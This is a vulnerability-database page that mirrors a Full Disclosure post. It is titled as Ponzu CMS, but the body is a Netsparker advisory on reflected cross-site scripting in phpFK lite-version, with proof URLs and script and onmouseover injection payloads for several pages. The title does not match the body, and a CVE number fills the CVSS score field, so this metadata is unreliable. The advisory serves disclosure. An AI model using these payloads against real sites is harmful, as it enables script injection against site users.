Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Reflected Cross-site Scripting Vulnerability in Ponzu CMS 0.9.4

Related Vulnerabilities: CVE-2017-18364  
Source 
                							

                <!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="14"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#15">By Date</a>
<a href="16"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="14"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#15">By Thread</a>
<a href="16"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>

</div>

<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">Reflected Cross-site Scripting Vulnerability in Ponzu CMS 0.9.4</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->


<em>From</em>: Daniel Bishtawi &lt;daniel () netsparker com&gt;


<em>Date</em>: Wed, 10 Jul 2019 10:09:25 +0200


<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">Hello,

We are informing you about the vulnerabilities we reported in phpFK
lite-version.

*Information:*

Advisory by Netsparker
Name: Multiple Cross-site Scripting Vulnerabilities in phpFK
Affected Software: phpFK
Affected Versions: lite-version
Homepage: <a rel="nofollow" href="https://www.frank-karau.de/">https://www.frank-karau.de/</a>
Vulnerability: Reflected Cross-site Scripting
Severity: 7.4 High
Status: Not Fixed
CVSS Score (3.0): CVE-2017-18364
CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Netsparker Advisory Reference: NS-19-006

*Technical Details:*

/faq.php (Query Based (Query String))

Parameter Name : Query Based
Parameter Type : Query String
Attack Pattern :
'"--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;netsparker(0x00164F)&lt;/scRipt&gt;
Proof URL : http://
{domain}/faq.php?'"--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;alert(0x00164F)&lt;/scRipt&gt;

/members.php (Query Based (Query String))

Parameter Name : Query Based
Parameter Type : Query String
Attack Pattern :
'"--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;netsparker(0x00158E)&lt;/scRipt&gt;
Proof URL : http://
{domain}/members.php?'"--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;alert(0x00158E)&lt;/scRipt&gt;

/members.php (search (GET))

Parameter Name : search
Parameter Type : GET
Attack Pattern : x%22+onmouseover%3dnetsparker(0x0069A0)+x%3d%22
Proof URL : http://
{domain}/members.php?search=x"%20onmouseover=netsparker(0x0069A0)%20x="&amp;sort=username

/members.php (search (POST))

Parameter Name : search
Parameter Type : POST
Attack Pattern : x%22+onmouseover%3dnetsparker(0x006EBA)+x%3d%22

/search.php (Query Based (Query String))

Parameter Name : Query Based
Parameter Type : Query String
Attack Pattern : '"--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;netsparker(0x00171D)&lt;/scRipt&gt;
Proof URL : http://
{domain}/search.php?'"--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;alert(0x00171D)&lt;/scRipt&gt;

/user.php (user (GET))

Parameter Name : user
Parameter Type : GET
Attack Pattern :
%3c%2ftitle%3e%3cscRipt%3enetsparker(0x001122)%3c%2fscRipt%3e
Proof URL : http://
{domain}/user.php?user=&lt;/title&gt;&lt;scRipt&gt;netsparker(0x001122)&lt;/scRipt&gt;

For more information:
<a rel="nofollow" href="https://www.netsparker.com/web-applications-advisories/ns-19-006-reflected-cross-site-scripting-in-phpfk/">https://www.netsparker.com/web-applications-advisories/ns-19-006-reflected-cross-site-scripting-in-phpfk/</a>

Regards,

Daniel Bishtawi
Marketing Administrator | Netsparker Web Application Security Scanner
Tel: +44 (0)20 3588 3843
Follow us on Twitter &lt;<a rel="nofollow" href="https://twitter.com/netsparker">https://twitter.com/netsparker</a>&gt; | LinkedIn
&lt;<a rel="nofollow" href="https://www.linkedin.com/company/netsparker-ltd">https://www.linkedin.com/company/netsparker-ltd</a>&gt; | Facebook
&lt;<a rel="nofollow" href="https://facebook.com/netsparker">https://facebook.com/netsparker</a>&gt;
&lt;<a rel="nofollow" href="https://www.netsparker.com/blog/events/exhibiting-black-hat-usa-2019/">https://www.netsparker.com/blog/events/exhibiting-black-hat-usa-2019/</a>&gt;

_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a>

</pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="14"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#15">By Date</a>
<a href="16"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="14"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#15">By Thread</a>
<a href="16"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><strong>Reflected Cross-site Scripting Vulnerability in Ponzu CMS 0.9.4</strong> <em>Daniel Bishtawi (Jul 12)</em>
</li></ul>


<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started